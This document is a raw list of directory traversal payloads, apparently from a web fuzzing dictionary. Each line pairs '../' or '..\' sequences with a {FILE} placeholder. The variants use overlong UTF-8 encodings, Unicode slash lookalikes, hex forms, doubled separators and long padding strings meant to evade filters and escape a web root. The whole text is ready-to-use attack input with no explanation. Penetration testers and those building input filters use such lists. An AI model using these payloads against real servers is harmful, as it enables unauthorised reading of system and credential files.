AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
